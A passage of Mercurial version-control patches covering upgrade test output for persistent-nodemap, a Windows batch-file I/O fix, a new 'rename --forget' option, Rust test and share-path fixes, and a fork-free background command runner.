[formatvariant.name.uptodate|generaldelta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] [formatvariant.name.uptodate|share-safe: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|sparserevlog: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] - [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] + [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] (no-rust !) + [formatvariant.name.mismatchdefault|persistent-nodemap:][formatvariant.repo.mismatchdefault| yes][formatvariant.config.special| yes][formatvariant.default| no] (rust !) [formatvariant.name.uptodate|copies-sdc: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|revlog-v2: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|plain-cl-delta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] @@ -142,10 +146,12 @@ "repo": true }, { - "config": false, + "config": false, (no-rust !) + "config": true, (rust !) "default": false, "name": "persistent-nodemap", - "repo": false + "repo": false (no-rust !) + "repo": true (rust !) }, { "config": false, @@ -184,7 +190,8 @@ performing an upgrade with "--run" will make the following changes: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) processed revlogs: - all-filelogs @@ -208,7 +215,8 @@ $ hg debugupgraderepo --quiet requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) processed revlogs: - all-filelogs @@ -223,7 +231,8 @@ performing an upgrade with "--run" will make the following changes: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-parent @@ -254,7 +263,8 @@ performing an upgrade with "--run" will make the following changes: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-parent @@ -279,7 +289,8 @@ $ hg debugupgrade --optimize re-delta-parent --quiet requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-parent @@ -323,7 +334,8 @@ generaldelta: no yes yes share-safe: no no no sparserevlog: no yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: no yes no (rust !) copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes @@ -337,7 +349,8 @@ generaldelta: no no yes share-safe: no no no sparserevlog: no no yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: no yes no (rust !) copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes @@ -351,7 +364,8 @@ [formatvariant.name.mismatchdefault|generaldelta: ][formatvariant.repo.mismatchdefault| no][formatvariant.config.special| no][formatvariant.default| yes] [formatvariant.name.uptodate|share-safe: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.mismatchdefault|sparserevlog: ][formatvariant.repo.mismatchdefault| no][formatvariant.config.special| no][formatvariant.default| yes] - [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] + [formatvariant.name.uptodate|persistent-nodemap:][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] (no-rust !) + [formatvariant.name.mismatchconfig|persistent-nodemap:][formatvariant.repo.mismatchconfig| no][formatvariant.config.special| yes][formatvariant.default| no] (rust !) [formatvariant.name.uptodate|copies-sdc: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|revlog-v2: ][formatvariant.repo.uptodate| no][formatvariant.config.default| no][formatvariant.default| no] [formatvariant.name.uptodate|plain-cl-delta: ][formatvariant.repo.uptodate| yes][formatvariant.config.default| yes][formatvariant.default| yes] @@ -373,12 +387,16 @@ sparserevlog in order to limit disk reading and memory usage on older version, the span of a delta chain from its root to its end is limited, whatever the relevant data in this span. This can severly limit Mercurial ability to build good chain of delta resulting is much more storage space being taken and limit reusability of on disk delta during exchange. + persistent-nodemap (rust !) + persist the node -> rev mapping on disk to speedup lookup (rust !) + (rust !) performing an upgrade with "--run" will make the following changes: requirements preserved: revlogv1, store - added: dotencode, fncache, generaldelta, sparserevlog + added: dotencode, fncache, generaldelta, sparserevlog (no-rust !) + added: dotencode, fncache, generaldelta, persistent-nodemap, sparserevlog (rust !) fncache repository will be more resilient to storing certain paths and performance of certain operations should be improved @@ -392,6 +410,9 @@ sparserevlog Revlog supports delta chain with more unused data between payload. These gaps will be skipped at read time. This allows for better delta chains, making a better compression and faster exchange with server. + persistent-nodemap (rust !) + Speedup revision lookup by node id. (rust !) + (rust !) processed revlogs: - all-filelogs - changelog @@ -414,7 +435,8 @@ $ hg debugupgraderepo --quiet requirements preserved: revlogv1, store - added: dotencode, fncache, generaldelta, sparserevlog + added: dotencode, fncache, generaldelta, sparserevlog (no-rust !) + added: dotencode, fncache, generaldelta, persistent-nodemap, sparserevlog (rust !) processed revlogs: - all-filelogs @@ -434,6 +456,9 @@ sparserevlog in order to limit disk reading and memory usage on older version, the span of a delta chain from its root to its end is limited, whatever the relevant data in this span. This can severly limit Mercurial ability to build good chain of delta resulting is much more storage space being taken and limit reusability of on disk delta during exchange. + persistent-nodemap (rust !) + persist the node -> rev mapping on disk to speedup lookup (rust !) + (rust !) repository lacks features used by the default config options: dotencode @@ -444,7 +469,8 @@ requirements preserved: revlogv1, store - added: fncache, generaldelta, sparserevlog + added: fncache, generaldelta, sparserevlog (no-rust !) + added: fncache, generaldelta, persistent-nodemap, sparserevlog (rust !) fncache repository will be more resilient to storing certain paths and performance of certain operations should be improved @@ -455,6 +481,9 @@ sparserevlog Revlog supports delta chain with more unused data between payload. These gaps will be skipped at read time. This allows for better delta chains, making a better compression and faster exchange with server. + persistent-nodemap (rust !) + Speedup revision lookup by node id. (rust !) + (rust !) processed revlogs: - all-filelogs - changelog @@ -513,7 +542,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, revlogv1, store + preserved: dotencode, fncache, revlogv1, store (no-rust !) + preserved: dotencode, fncache, persistent-nodemap, revlogv1, store (rust !) added: generaldelta generaldelta @@ -554,6 +584,7 @@ $ cat .hg/upgradebackup.*/requires dotencode fncache + persistent-nodemap (rust !) revlogv1 store @@ -563,6 +594,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlogv1 store @@ -614,7 +646,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, store + preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !) added: sparserevlog sparserevlog @@ -655,7 +688,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-parent @@ -732,7 +766,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-parent @@ -782,7 +817,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-parent @@ -831,7 +867,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-parent @@ -884,7 +921,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, store + preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !) removed: sparserevlog optimisations: re-delta-parent @@ -938,7 +976,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, store + preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !) added: sparserevlog optimisations: re-delta-parent @@ -1003,7 +1042,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-fulladd @@ -1066,6 +1106,7 @@ fncache generaldelta largefiles + persistent-nodemap (rust !) revlogv1 sparserevlog store @@ -1077,6 +1118,7 @@ fncache generaldelta largefiles + persistent-nodemap (rust !) revlogv1 sparserevlog store @@ -1166,7 +1208,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) optimisations: re-delta-all @@ -1226,6 +1269,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlogv1 store @@ -1234,7 +1278,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, store + preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !) added: sparserevlog processed revlogs: @@ -1246,6 +1291,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlogv1 sparserevlog store @@ -1255,7 +1301,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, store + preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !) removed: sparserevlog processed revlogs: @@ -1267,6 +1314,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlogv1 store @@ -1281,7 +1329,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, store + preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !) added: revlog-compression-zstd, sparserevlog processed revlogs: @@ -1296,7 +1345,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes @@ -1307,6 +1357,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd revlogv1 sparserevlog @@ -1318,7 +1369,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) removed: revlog-compression-zstd processed revlogs: @@ -1333,7 +1385,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes @@ -1344,6 +1397,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlogv1 sparserevlog store @@ -1358,7 +1412,8 @@ upgrade will perform the following actions: requirements - preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store + preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !) added: revlog-compression-zstd processed revlogs: @@ -1373,7 +1428,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes @@ -1384,6 +1440,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd revlogv1 sparserevlog @@ -1401,7 +1458,8 @@ requirements preserved: dotencode, fncache, generaldelta, store (no-zstd !) - preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd !) + preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlog-compression-zstd, sparserevlog, store (rust !) removed: revlogv1 added: exp-revlogv2.2, exp-sidedata-flag (zstd !) added: exp-revlogv2.2, exp-sidedata-flag, sparserevlog (no-zstd !) @@ -1418,7 +1476,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no revlog-v2: yes no no plain-cl-delta: yes yes yes @@ -1431,6 +1490,7 @@ exp-sidedata-flag fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) sparserevlog store @@ -1446,7 +1506,8 @@ requirements preserved: dotencode, fncache, generaldelta, sparserevlog, store (no-zstd !) - preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd !) + preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlog-compression-zstd, sparserevlog, store (rust !) removed: exp-revlogv2.2, exp-sidedata-flag added: revlogv1 @@ -1462,7 +1523,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no revlog-v2: no no no plain-cl-delta: yes yes yes @@ -1473,6 +1535,7 @@ dotencode fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) revlogv1 sparserevlog @@ -1490,7 +1553,8 @@ requirements preserved: dotencode, fncache, generaldelta, sparserevlog, store (no-zstd !) - preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd !) + preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd no-rust !) + preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlog-compression-zstd, sparserevlog, store (rust !) removed: revlogv1 added: exp-revlogv2.2, exp-sidedata-flag @@ -1506,7 +1570,8 @@ generaldelta: yes yes yes share-safe: no no no sparserevlog: yes yes yes - persistent-nodemap: no no no + persistent-nodemap: no no no (no-rust !) + persistent-nodemap: yes yes no (rust !) copies-sdc: no no no revlog-v2: yes yes no plain-cl-delta: yes yes yes @@ -1519,6 +1584,7 @@ exp-sidedata-flag fncache generaldelta + persistent-nodemap (rust !) revlog-compression-zstd (zstd !) sparserevlog store # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1617982339 14400 # Fri Apr 09 11:32:19 2021 -0400 # Node ID fc8a5c9ecee0877c01280ccb775387efd2bd62e6 # Parent cc3ad5c3af3bfabcaaacd2b4cc38cf865bc5be07 win32: enable legacy I/O mode to fix missing pager output on Windows with py3 The equivalent interpreter option is set by wrapper.exe, but this *.bat file is what gets installed in a venv. Without this mode, any command that spins up a pager has no output, unless the pager is explicitly disabled. The variable is set inside the `setlocal` scope to keep it from leaking into the environment after the bat file exits. We should probably still figure out how to ship a compiled hg.exe when installing with `pip`, because the binary does other things like enable long filename support. But this avoids the dangerous and confusing lack of output in the meantime. Differential Revision: https://phab.mercurial-scm.org/D10354 diff --git a/contrib/win32/hg.bat b/contrib/win32/hg.bat --- a/contrib/win32/hg.bat +++ b/contrib/win32/hg.bat @@ -4,6 +4,8 @@ setlocal set HG=%~f0 +set PYTHONLEGACYWINDOWSSTDIO=1 + rem Use a full path to Python (relative to this script) if it exists, rem as the standard Python install does not put python.exe on the PATH... rem Otherwise, expect that python.exe can be found on the PATH. # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1617983200 25200 # Fri Apr 09 08:46:40 2021 -0700 # Node ID 37f49d46239448523e6dfbbe9bc07b71150b3317 # Parent fc8a5c9ecee0877c01280ccb775387efd2bd62e6 rename: add --forget option and stop suggesting `hg revert` for undoing Differential Revision: https://phab.mercurial-scm.org/D10355 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -2413,7 +2413,8 @@ To undo marking a destination file as copied, use --forget. With that option, all given (positional) arguments are unmarked as copies. The - destination file(s) will be left in place (still tracked). + destination file(s) will be left in place (still tracked). Note that + :hg:`copy --forget` behaves the same way as :hg:`rename --forget`. This command takes effect with the next commit by default. @@ -5914,6 +5915,7 @@ @command( b'rename|move|mv', [ + (b'', b'forget', None, _(b'unmark a destination file as renamed')), (b'A', b'after', None, _(b'record a rename that has already occurred')), ( b'', @@ -5945,8 +5947,13 @@ exist in the working directory. If invoked with -A/--after, the operation is recorded, but no copying is performed. - This command takes effect at the next commit. To undo a rename - before that, see :hg:`revert`. + To undo marking a destination file as renamed, use --forget. With that + option, all given (positional) arguments are unmarked as renames. The + destination file(s) will be left in place (still tracked). The source + file(s) will not be restored. Note that :hg:`rename --forget` behaves + the same way as :hg:`copy --forget`. + + This command takes effect with the next commit by default. Returns 0 on success, 1 if errors are encountered. """ diff --git a/tests/test-completion.t b/tests/test-completion.t --- a/tests/test-completion.t +++ b/tests/test-completion.t @@ -361,7 +361,7 @@ push: force, rev, bookmark, all-bookmarks, branch, new-branch, pushvars, publish, ssh, remotecmd, insecure recover: verify remove: after, force, subrepos, include, exclude, dry-run - rename: after, at-rev, force, include, exclude, dry-run + rename: forget, after, at-rev, force, include, exclude, dry-run resolve: all, list, mark, unmark, no-status, re-merge, tool, include, exclude, template revert: all, date, rev, no-backup, interactive, include, exclude, dry-run rollback: dry-run, force diff --git a/tests/test-copy.t b/tests/test-copy.t --- a/tests/test-copy.t +++ b/tests/test-copy.t @@ -277,19 +277,25 @@ $ rm baz xyzzy -Test unmarking copy of a single file +Test unmarking copy/rename of a single file # Set up by creating a copy $ hg cp bar baz -# Test uncopying a non-existent file +# Test unmarking as copy a non-existent file $ hg copy --forget non-existent non-existent: $ENOENT$ -# Test uncopying an tracked but unrelated file + $ hg rename --forget non-existent + non-existent: $ENOENT$ +# Test unmarking as copy an tracked but unrelated file $ hg copy --forget foo foo: not unmarking as copy - file is not marked as copied -# Test uncopying a copy source + $ hg rename --forget foo + foo: not unmarking as copy - file is not marked as copied +# Test unmarking as copy a copy source $ hg copy --forget bar bar: not unmarking as copy - file is not marked as copied + $ hg rename --forget bar + bar: not unmarking as copy - file is not marked as copied # baz should still be marked as a copy $ hg st -C A baz @@ -298,17 +304,38 @@ $ hg copy --forget baz $ hg st -C A baz -# Test uncopy with matching an non-matching patterns + $ rm bar + $ hg rename --after bar baz + $ hg st -C + A baz + bar + R bar + $ hg rename --forget baz + $ hg st -C + A baz + R bar + $ hg revert bar +# Test unmarking as copy with matching an non-matching patterns $ hg cp bar baz --after $ hg copy --forget bar baz bar: not unmarking as copy - file is not marked as copied + $ hg cp bar baz --after + $ hg rename --forget bar baz + bar: not unmarking as copy - file is not marked as copied $ hg st -C A baz -# Test uncopy with no exact matches +# Test unmarking as copy with no exact matches $ hg cp bar baz --after $ hg copy --forget . $ hg st -C A baz + $ hg cp bar baz --after + $ hg st -C + A baz + bar + $ hg rename --forget . + $ hg st -C + A baz $ hg forget baz $ rm baz # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1617962571 -7200 # Fri Apr 09 12:02:51 2021 +0200 # Node ID 6d5a26e94d9ee9816f1b9a45b22f55ed1b2b7ab0 # Parent 37f49d46239448523e6dfbbe9bc07b71150b3317 unit-tests: Fix `cargo test` on 32-bit platforms Fixes https://bz.mercurial-scm.org/show_bug.cgi?id=6506 This makes `IndexEntryBuilder::build`, which is only used in unit tests, use `u32` or `u64` instead of platform-dependent `usize` when packing binary data to be used at test input. To run Rust unit tests in 32-bit mode in a x86-64 environment, use: rustup target add i686-unknown-linux-gnu # Once (cd rust && cargo test --target i686-unknown-linux-gnu) Differential Revision: https://phab.mercurial-scm.org/D10351 diff --git a/rust/hg-core/src/revlog/index.rs b/rust/hg-core/src/revlog/index.rs --- a/rust/hg-core/src/revlog/index.rs +++ b/rust/hg-core/src/revlog/index.rs @@ -300,12 +300,12 @@ // Remaining offset bytes. bytes.extend(&[0u8; 2]); } else { - // Offset is only 6 bytes will usize is 8. - bytes.extend(&self.offset.to_be_bytes()[2..]); + // Offset stored on 48 bits (6 bytes) + bytes.extend(&(self.offset as u64).to_be_bytes()[2..]); } bytes.extend(&[0u8; 2]); // Revision flags. - bytes.extend(&self.compressed_len.to_be_bytes()[4..]); - bytes.extend(&self.uncompressed_len.to_be_bytes()[4..]); + bytes.extend(&(self.compressed_len as u32).to_be_bytes()); + bytes.extend(&(self.uncompressed_len as u32).to_be_bytes()); bytes.extend(&self.base_revision.to_be_bytes()); bytes } # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1617921788 14400 # Thu Apr 08 18:43:08 2021 -0400 # Node ID 218a26df7813fee76632a483860f54cd09798a13 # Parent 6d5a26e94d9ee9816f1b9a45b22f55ed1b2b7ab0 share: store relative share paths with '/' separators I created a relative share in Windows and tried to use it in WSL, and it failed: abort: .hg/sharedpath points to nonexistent directory /mnt/c/Users/Matt/hg-review/.hg/..\..\hg\.hg Use `normpath` on the read side so that the code has the usual Windows style paths it always had (I don't think that matters much), but it also eliminates the directory escaping path components in the case where the path is printed. This will not fix repositories that have already been created, but it's trivial enough to hand edit the file to correct it. Differential Revision: https://phab.mercurial-scm.org/D10330 diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -469,7 +469,7 @@ # ``.hg/`` for ``relshared``. sharedpath = hgvfs.read(b'sharedpath').rstrip(b'\n') if requirementsmod.RELATIVE_SHARED_REQUIREMENT in requirements: - sharedpath = hgvfs.join(sharedpath) + sharedpath = util.normpath(hgvfs.join(sharedpath)) sharedvfs = vfsmod.vfs(sharedpath, realpath=True) @@ -3672,6 +3672,7 @@ if createopts.get(b'sharedrelative'): try: sharedpath = os.path.relpath(sharedpath, hgvfs.base) + sharedpath = util.pconvert(sharedpath) except (IOError, ValueError) as e: # ValueError is raised on Windows if the drive letters differ # on each path. # HG changeset patch # User Valentin Gatien-Baron <valentin.gatienbaron@gmail.com> # Date 1600049665 14400 # Sun Sep 13 22:14:25 2020 -0400 # Node ID 8759e22f1649cd71a59d05e8f5ef8dce77ca4b44 # Parent 218a26df7813fee76632a483860f54cd09798a13 procutil: avoid using os.fork() to implement runbgcommand We ran into the following deadlock: - some command creates an ssh peer, then raises without explicitly closing the peer (hg id + extension in our case) - dispatch catches the exception, calls ui.log('commandfinish', ..) (the sshpeer is still not closed), which calls logtoprocess, which calls procutil.runbgcommand. - in the child of runbgcommand's fork(), between the fork and the exec, the opening of file descriptors triggers a gc which runs the destructor for sshpeer, which waits on ssh's stderr being closed, which never happens since ssh's stderr is held open by the parent of the fork where said destructor hasn't run Remotefilelog appears to have a hack around this deadlock as well. I don't know if there's more subtlety to it, because even though the problem is determistic, it is very fragile, so I didn't manage to reduce it. I can imagine three ways of tackling this problem: 1. don't run any python between fork and exec in runbgcommand 2. make the finalizer harmless after the fork 3. close the peer without relying on gc behavior This commit goes with 1, as forking without exec'ing is tricky in general in a language with gc finalizers. And maybe it's better in the presence of rust threads. A future commit will try 2 or 3. Performance wise: at low memory usage, it's an improvement. At higher memory usage, it's about 2x faster than before when ensurestart=True, but 2x slower when ensurestart=False. Not sure if that matters. The reason for that last bit is that the subprocess.Popen always waits for the execve to finish, and at high memory usage, execve is slow because it deallocates the large page table. Numbers and script: before after mem=1.0GB, ensurestart=True 52.1ms 26.0ms mem=1.0GB, ensurestart=False 14.7ms 26.0ms mem=0.5GB, ensurestart=True 23.2ms 11.2ms mem=0.5GB, ensurestart=False 6.2ms 11.3ms mem=0.2GB, ensurestart=True 15.7ms 7.4ms mem=0.2GB, ensurestart=False 4.3ms 8.1ms mem=0.0GB, ensurestart=True 2.3ms 0.7ms mem=0.0GB, ensurestart=False 0.8ms 0.8ms import time for memsize in [1_000_000_000, 500_000_000, 250_000_000, 0]: mem = 'a' * memsize for ensurestart in [True, False]: now = time.time() n = 100 for i in range(n): procutil.runbgcommand([b'true'], {}, ensurestart=ensurestart) after = time.time() ms = (after - now) / float(n) * 1000 print(f'mem={memsize / 1e9:.1f}GB, ensurestart={ensurestart} -> {ms:.1f}ms') Differential Revision: https://phab.mercurial-scm.org/D9019 diff --git a/mercurial/utils/procutil.py b/mercurial/utils/procutil.py --- a/mercurial/utils/procutil.py +++ b/mercurial/utils/procutil.py @@ -701,7 +701,88 @@ else: - def runbgcommand( + def runbgcommandpy3( + cmd, + env, + shell=False, + stdout=None, + stderr=None, + ensurestart=True, + record_wait=None, + stdin_bytes=None, + ): + """Spawn a command without waiting for it to finish. + + + When `record_wait` is not None, the spawned process will not be fully + detached and the `record_wait` argument will be called with a the + `Subprocess.wait` function for the spawned process. This is mostly + useful for developers that need to make sure the spawned process + finished before a certain point. (eg: writing test)""" + if pycompat.isdarwin: + # avoid crash in CoreFoundation in case another thread + # calls gui() while we're calling fork(). + gui() + + if shell: + script = cmd + else: + if isinstance(cmd, bytes): + cmd = [cmd] + script = b' '.join(shellquote(x) for x in cmd) + if record_wait is None: + # double-fork to completely detach from the parent process + script = b'( %s ) &' % script + start_new_session = True + else: + start_new_session = False + ensurestart = True + + try: + if stdin_bytes is None: + stdin = subprocess.DEVNULL + else: + stdin = pycompat.unnamedtempfile() + stdin.write(stdin_bytes) + stdin.flush() + stdin.seek(0) + if stdout is None: + stdout = subprocess.DEVNULL + if stderr is None: + stderr = subprocess.DEVNULL + + p = subprocess.Popen( + script, + shell=True, + env=env, + close_fds=True, + stdin=stdin, + stdout=stdout, + stderr=stderr, + start_new_session=start_new_session, + ) + except Exception: + if record_wait is not None: + record_wait(255) + raise + finally: + if stdin_bytes is not None: + stdin.close() + if not ensurestart: + # Even though we're not waiting on the child process, + # we still must call waitpid() on it at some point so + # it's not a zombie/defunct. This is especially relevant for + # chg since the parent process won't die anytime soon. + # We use a thread to make the overhead tiny. + t = threading.Thread(target=lambda: p.wait) + t.daemon = True + t.start() + else: + returncode = p.wait + if record_wait is not None: + record_wait(returncode) + + def runbgcommandpy2( cmd, env, shell=False, @@ -811,3 +892,14 @@ stdin.close() if record_wait is None: os._exit(returncode) + + if pycompat.ispy3: + # This branch is more robust, because it avoids running python + # code (hence gc finalizers, like sshpeer.__del__, which + # blocks). But we can't easily do the equivalent in py2, + # because of the lack of start_new_session=True flag. Given + # that the py2 branch should die soon, the short-lived + # duplication seems acceptable. + runbgcommand = runbgcommandpy3 + else: + runbgcommand = runbgcommandpy2 # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1617911214 -7200 # Thu Apr 08 21:46:54 2021 +0200 # Node ID 441024b279a635f3bf9bd0e857c8e346abb48d98 # Parent 8759e22f1649cd71a59d05e8f5ef8dce77ca4b44 rust: Remove the compile-time 'dirstate-tree' feature flag This code has compiler errors since it is not built on CI and nobody has been working on it for some time. We (Octobus) are still pursuing status optimizations based on a tree data structure for the dirstate, but upcoming patches will use a run-time opt-in instead of compile-time, so that at least corresponding Rust code keeps compiling when other changes are made. Differential Revision: https://phab.mercurial-scm.org/D10329 diff --git a/rust/hg-core/Cargo.toml b/rust/hg-core/Cargo.toml --- a/rust/hg-core/Cargo.toml +++ b/rust/hg-core/Cargo.toml @@ -41,9 +41,3 @@ clap = "*" pretty_assertions = "0.6.1" tempfile = "3.1.0" - -[features] -# Use a (still unoptimized) tree for the dirstate instead of the current flat -# dirstate. This is not yet recommended for performance reasons. A future -# version might make it the default, or make it a runtime option. -dirstate-tree = [] diff --git a/rust/hg-core/src/dirstate.rs b/rust/hg-core/src/dirstate.rs --- a/rust/hg-core/src/dirstate.rs +++ b/rust/hg-core/src/dirstate.rs @@ -14,8 +14,6 @@ pub mod dirs_multiset; pub mod 